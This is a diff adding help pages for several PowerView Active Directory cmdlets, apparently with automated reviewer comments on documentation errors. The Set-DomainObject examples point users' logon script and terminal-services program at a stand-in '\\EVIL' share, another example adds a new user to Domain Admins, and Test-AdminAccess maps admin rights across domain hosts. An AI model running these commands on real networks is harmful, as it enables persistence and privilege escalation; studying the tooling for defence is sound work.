+Position: 4
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Description
+Specifies the description of the user to create.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 5
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use to search for user/group principals, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 6
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 7
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### DirectoryServices.AccountManagement.UserPrincipal
+
+## NOTES
+
+## RELATED LINKS
+
+[http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/](http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/)
+
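Review bot: Example 3's remark claims `Creates the 'andy' user with the specified description and password`, but the command `New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred` passes no `-Description`; drop "description" from the remark. The same ee617253 TechNet URL is cited here for New-ADUser and in the New-DomainGroup hunk above for New-ADGroup, so one of them is wrong, and the TODO line should move out of SYNOPSIS. As in the other hunks, Examples 1 through 3 fence only their first `ConvertTo-SecureString` line and leave the actual `New-DomainUser` invocation outside the fence. `-Domain` again says `search for user/group principals` although the function creates a user rather than searching for one.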
diff --git a/docs/Recon/Remove-RemoteConnection.md b/docs/Recon/Remove-RemoteConnection.md new file mode 100755 index 0000000..fe6f3b3 --- /dev/null +++ b/docs/Recon/Remove-RemoteConnection.md @@ -0,0 +1,84 @@ +# Remove-RemoteConnection
+
+## SYNOPSIS
+Destroys a connection created by New-RemoteConnection.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
+
+## SYNTAX
+
+### ComputerName (Default)
+```
+Remove-RemoteConnection [-ComputerName] <String[]>
+```
+
+### Path
+```
+Remove-RemoteConnection [-Path] <String[]>
+```
+
+## DESCRIPTION
+This function uses WNetCancelConnection2 to destroy a connection created by
+New-RemoteConnection.
+If a -Path isn't specified, a -ComputerName is required to
+'unmount' \\\\$ComputerName\IPC$.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Remove-RemoteConnection -ComputerName 'PRIMARY.testlab.local'
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Remove-RemoteConnection -Path '\\PRIMARY.testlab.local\C$\'
+```
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Remove-RemoteConnection
+```
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the system to remove a \\\\ComputerName\IPC$ connection for.
+
+```yaml
+Type: String[]
+Parameter Sets: ComputerName
+Aliases: HostName, dnshostname, name
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Path
+Specifies the remote \\\\UNC\path to remove the connection for.
+
+```yaml
+Type: String[]
+Parameter Sets: Path
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
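Review bot: both parameter sets bind their only parameter at `Position: 1` with `ComputerName` marked as the default set, so a bare positional argument such as a UNC path would be bound to `-ComputerName` under the default set and treated as a host name; the DESCRIPTION should state that `-Path` must be passed by name (Example 2 does so, but nothing says it is required). The three examples carry no remarks describing the expected result, and `## OUTPUTS` is empty; a short remark under each example plus a line on what the function returns would complete the page. The `-Path` text `Specifies the remote \\\\UNC\path to remove the connection for.` renders as a placeholder rather than an example; reusing the Example 2 value `\\PRIMARY.testlab.local\C$\` there would be clearer.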
diff --git a/docs/Recon/Resolve-IPAddress.md b/docs/Recon/Resolve-IPAddress.md new file mode 100755 index 0000000..744c764 --- /dev/null +++ b/docs/Recon/Resolve-IPAddress.md @@ -0,0 +1,66 @@ +# Resolve-IPAddress
+
+## SYNOPSIS
+Resolves a given hostename to its associated IPv4 address.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Resolve-IPAddress [[-ComputerName] <String[]>]
+```
+
+## DESCRIPTION
+Resolves a given hostename to its associated IPv4 address using
+\[Net.Dns\]::GetHostEntry().
+If no hostname is provided, the default
+is the IP address of the localhost.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Resolve-IPAddress -ComputerName SERVER
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+@("SERVER1", "SERVER2") | Resolve-IPAddress
+```
+
+## PARAMETERS
+
+### -ComputerName
+{{Fill ComputerName Description}}
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: $Env:COMPUTERNAME
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### String
+
+Accepts one or more IP address strings on the pipeline.
+
+## OUTPUTS
+
+### System.Management.Automation.PSCustomObject
+
+A custom PSObject with the ComputerName and IPAddress.
+
+## NOTES
+
+## RELATED LINKS
+
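Review bot: the `-ComputerName` description is the unfilled platyPS template placeholder `{{Fill ComputerName Description}}`; replace it with the text from a `.PARAMETER ComputerName` block in the source before shipping the docs. The `## INPUTS` text `Accepts one or more IP address strings on the pipeline.` contradicts the SYNOPSIS, which resolves a host name to its IPv4 address; the pipeline input is host names, as Example 2's `@("SERVER1", "SERVER2") | Resolve-IPAddress` shows. `hostename` in both SYNOPSIS and DESCRIPTION should be `hostname`, and the DESCRIPTION's `the default is the IP address of the localhost` should match the yaml `Default value: $Env:COMPUTERNAME` by saying the local computer name is resolved.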
diff --git a/docs/Recon/Set-DomainObject.md b/docs/Recon/Set-DomainObject.md new file mode 100755 index 0000000..482d86d --- /dev/null +++ b/docs/Recon/Set-DomainObject.md @@ -0,0 +1,346 @@ +# Set-DomainObject
+
+## SYNOPSIS
+Modifies a gven property for a specified active directory object.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObject
+
+## SYNTAX
+
+```
+Set-DomainObject [[-Identity] <String[]>] [-Set <Hashtable>] [-XOR <Hashtable>] [-Clear <String[]>]
+ [-Domain <String>] [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone]
+ [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Splats user/object targeting parameters to Get-DomainObject, returning the raw
+searchresult object.
+Retrieves the raw directoryentry for the object, and sets
+any values from -Set @{}, XORs any values from -XOR @{}, and clears any values
+from -Clear @().
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
+```
+
+VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))
+VERBOSE: Setting mstsinitialprogram to \\\\EVIL\program.exe for object testuser
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Set @{'countrycode'=1234; 'mstsinitialprogram'='\\EVIL\program2.exe'} -Verbose
+```
+
+VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: Get-DomainObject filter string:
+(&(|(objectsid=S-1-5-21-890171859-3433809279-3366196753-1108)))
+VERBOSE: Setting mstsinitialprogram to \\\\EVIL\program2.exe for object harmj0y
+VERBOSE: Setting countrycode to 1234 for object harmj0y
+VERBOSE: Get-DomainSearcher search string:
+LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))
+VERBOSE: Setting mstsinitialprogram to \\\\EVIL\program2.exe for object testuser
+VERBOSE: Setting countrycode to 1234 for object testuser
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Clear department -Verbose
+```
+
+Cleares the 'department' field for both object identities.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Get-DomainUser testuser | ConvertFrom-UACValue -Verbose
+```
+
+Name Value
+---- -----
+NORMAL_ACCOUNT 512
+
+
+Set-DomainObject -Identity testuser -XOR @{useraccountcontrol=65536} -Verbose
+
+VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))
+VERBOSE: XORing 'useraccountcontrol' with '65536' for object 'testuser'
+
+Get-DomainUser testuser | ConvertFrom-UACValue -Verbose
+
+Name Value
+---- -----
+NORMAL_ACCOUNT 512
+DONT_EXPIRE_PASSWORD 65536
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+Get-DomainUser -Identity testuser -Properties scriptpath
+```
+
+scriptpath
+----------
+\\\\primary\sysvol\blah.ps1
+
+$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Set-DomainObject -Identity testuser -Set @{'scriptpath'='\\\\EVIL\program2.exe'} -Credential $Cred -Verbose
+VERBOSE: \[Get-Domain\] Using alternate credentials for Get-Domain
+VERBOSE: \[Get-Domain\] Extracted domain 'TESTLAB' from -Credential
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainSearcher\] Using alternate credentials for LDAP connection
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser))))
+VERBOSE: \[Set-DomainObject\] Setting 'scriptpath' to '\\\\EVIL\program2.exe' for object 'testuser'
+
+Get-DomainUser -Identity testuser -Properties scriptpath
+
+scriptpath
+----------
+\\\\EVIL\program2.exe
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Set
+Specifies values for one or more object properties (in the form of a hashtable) that will replace the current values.
+
+```yaml
+Type: Hashtable
+Parameter Sets: (All)
+Aliases: Reaplce
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -XOR
+Specifies values for one or more object properties (in the form of a hashtable) that will XOR the current values.
+
+```yaml
+Type: Hashtable
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Clear
+Specifies an array of object properties that will be cleared in the directory.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+{{Fill SecurityMasks Description}}
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ADObject
+
+Custom PSObject with translated AD object property fields, if -PassThru is enabled.
+
+PowerView.ADObject.Raw
+
+The raw DirectoryServices.SearchResult object, if -PassThru and -Raw are enabled.
+
+## NOTES
+
+## RELATED LINKS
+
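Review bot: the `## OUTPUTS` section references `-PassThru` and `-Raw` (`if -PassThru is enabled`, `if -PassThru and -Raw are enabled`), but neither switch appears in the SYNTAX block or under PARAMETERS, so either the help text is stale or the parameters are missing from the function; reconcile the two. `-SecurityMasks` still carries the template placeholder `{{Fill SecurityMasks Description}}`. `-ServerTimeLimit` says `Default of 120 seconds.` while its yaml block says `Default value: 0`; one of them is wrong. The `-Set` alias is spelled `Reaplce`, which platyPS reads from the parameter's `[Alias()]` attribute, so `-Replace` will not bind until the source is fixed. The `-Identity` text says `Wildcards accepted.` while its yaml says `Accept wildcard characters: False`. Smaller fixes: `gven` in SYNOPSIS, `Cleares` in Example 3, the missing space in `'Password123!'-AsPlainText` in Example 5, and the `-Identity` description being broken mid-sentence after each `e.g.` by the generator's sentence splitting.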
diff --git a/docs/Recon/Test-AdminAccess.md b/docs/Recon/Test-AdminAccess.md new file mode 100755 index 0000000..84eab4e --- /dev/null +++ b/docs/Recon/Test-AdminAccess.md @@ -0,0 +1,101 @@ +# Test-AdminAccess
+
+## SYNOPSIS
+Tests if the current user has administrative access to the local (or a remote) machine.
+
+Idea stolen from the local_admin_search_enum post module in Metasploit written by:
+ 'Brandon McCann "zeknox" \<bmccann\[at\]accuvant.com\>'
+ 'Thomas McCarthy "smilingraccoon" \<smilingraccoon\[at\]gmail.com\>'
+ 'Royce Davis "r3dy" \<rdavis\[at\]accuvant.com\>'
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
+
+## SYNTAX
+
+```
+Test-AdminAccess [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will use the OpenSCManagerW Win32API call to establish
+a handle to the remote host.
+If this succeeds, the current user context
+has local administrator acess to the target.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Test-AdminAccess -ComputerName sqlserver
+```
+
+Returns results indicating whether the current user has admin access to the 'sqlserver' host.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainComputer | Test-AdminAccess
+```
+
+Returns what machines in the domain the current user has access to.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Test-AdminAccess -ComputerName sqlserver -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to check for local admin access (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.AdminAccess
+
+A PSCustomObject containing the ComputerName and 'IsAdmin' set to whether
+the current user has local admin rights, along with the ComputerName added.
+
+## NOTES
+
+## RELATED LINKS
+
+[https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb
+http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb
+http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)
+
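Review bot: RELATED LINKS is malformed: the two URLs are merged into a single link whose text and target both contain a newline (`[https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb` / `http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](...)`), so it will not render as two working links; split them into separate `.LINK` entries. The `## OUTPUTS` sentence names ComputerName twice (`containing the ComputerName and 'IsAdmin' ... along with the ComputerName added`); drop the trailing clause. DESCRIPTION has `acess` for `access`, and it should mention that when `-Credential` is supplied the check runs under `Invoke-UserImpersonation` and is reverted with `Invoke-RevertToSelf`, since both are listed as required dependencies but only the `-Credential` text hints at it. Example 3 has the fencing split seen throughout this patch (`$SecPassword` fenced, `$Cred = New-Object ...` and `Test-AdminAccess -ComputerName sqlserver -Credential $Cred` outside), and `-ComputerName` says `Defaults to 'localhost'` while the yaml says `Default value: Localhost`; pick one spelling.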